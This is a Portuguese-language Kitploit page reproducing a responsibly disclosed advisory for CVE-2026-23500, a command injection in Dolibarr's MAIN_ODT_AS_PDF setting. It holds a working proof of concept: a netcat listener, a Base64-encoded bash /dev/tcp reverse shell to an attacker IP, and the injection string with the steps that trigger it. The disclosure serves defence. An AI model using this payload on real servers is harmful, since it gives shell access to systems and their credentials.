Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23500 — CVE-2026-23500 - Injeção de Comandos do SO (RCE) através da configuração MAIN_ODT_AS_PDF no Dolibarr | Kitploit
Ferramentas/GitHubGitHub/lukasz-rybak/cve-2026-23500
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControlePapers e PesquisaAprendizado e Educação
GitHublukasz-rybak/cve-2026-23500

CVE-2026-23500

CVE-2026-23500 - Injeção de Comandos do SO (RCE) através da configuração MAIN_ODT_AS_PDF no Dolibarr

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23500: Injeção de Comandos do SO (RCE) via configuração MAIN_ODT_AS_PDF no Dolibarr

Visão Geral

CampoDetalhes
ID do CVECVE-2026-23500
SeveridadeCRÍTICA
AvisoGHSA-w5j3-8fcr-h87w
Descoberto porLukasz Rybak

Produtos Afetados

  • Dolibarr/dolibarr (versões: <= 22.0.4)
  • Corrigido na versão: 23.0

Classificação CWE

  • CWE-78: Neutralização Incorreta de Elementos Especiais usados em um Comando do SO ('Injeção de Comandos do SO')

Detalhes

Resumo

Um administrador autenticado pode executar comandos arbitrários do sistema operacional ao injetar uma carga maliciosa na constante de configuração MAIN_ODT_AS_PDF. Essa vulnerabilidade existe porque o aplicativo não valida nem escapa adequadamente o caminho do comando antes de passá-lo para a função exec() no processo de conversão de ODT para PDF.

Detalhes

A vulnerabilidade está localizada em htdocs/includes/odtphp/odf.php. Quando o sistema tenta converter um documento ODT para PDF (por exemplo, em Propostas, Faturas), ele constrói um comando de shell usando a configuração global MAIN_ODT_AS_PDF.

Trecho de código (htdocs/includes/odtphp/odf.php, aproximadamente linha 930):

root@kitploit:~
$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);

Enquanto o nome do arquivo $name é sanitizado usando escapeshellcmd(), a variável de configuração MAIN_ODT_AS_PDF é recuperada diretamente do banco de dados e concatenada no início da string. Um atacante com privilégios administrativos pode definir essa variável para incluir um separador de comandos (como ;) seguido de comandos arbitrários.

PoC

Pré-requisitos:

  1. Faça login como Administrador.
  2. Garanta que o módulo "Commercial Proposals" esteja habilitado e que os "ODT templates" estejam ativados na sua configuração.

Passos para reproduzir (Reverse Shell):

  1. Inicie um listener netcat na máquina do atacante (IP: 172.26.0.1, Porta: 4445):
root@kitploit:~
nc -lvnp 4445
  1. Prepare a carga maliciosa. Para evitar problemas com caracteres especiais (como & ou >) sendo escapados pelo aplicativo web ou pelo shell, codifique o comando do reverse shell em Base64:

    root@kitploit:~
    # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'
    echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
    # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
    
  2. Navegue até Home -> Setup -> Other Setup.

  3. Adicione ou modifique a constante MAIN_ODT_AS_PDF com a seguinte carga de injeção:

    root@kitploit:~
    jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
    

    (Explicação: jodconverter atende à verificação inicial, ; atua como separador de comandos, e o pipeline decodifica e executa a carga em Base64).

    imagem
  4. Navegue até Commerce -> New proposal, crie um rascunho, selecione um modelo ODT (por exemplo, generic_proposal_odt) e clique em .

imagem imagem
  1. Verifique o listener netcat. Uma conexão será estabelecida, concedendo um shell no servidor:
imagem

Impacto

Execução Remota de Código (RCE). Um atacante que obtenha acesso a uma conta de administrador (ou um administrador mal-intencionado) pode executar comandos arbitrários no servidor subjacente com os privilégios do usuário do servidor web (normalmente www-data). Isso permite:

  • Ler arquivos de configuração sensíveis (credenciais do banco de dados).
  • Modificar o código do aplicativo.
  • Comprometer totalmente o sistema dependendo da configuração do servidor (por exemplo, docker escape, pivoting).

Créditos

Reportado por Łukasz Rybak

Referências

  • https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23500

Aviso Legal

Este CVE foi divulgado de forma responsável, seguindo práticas de divulgação coordenada de vulnerabilidades. As informações fornecidas aqui são apenas para fins educacionais e defensivos.

Baixar ferramenta
Generate
imagem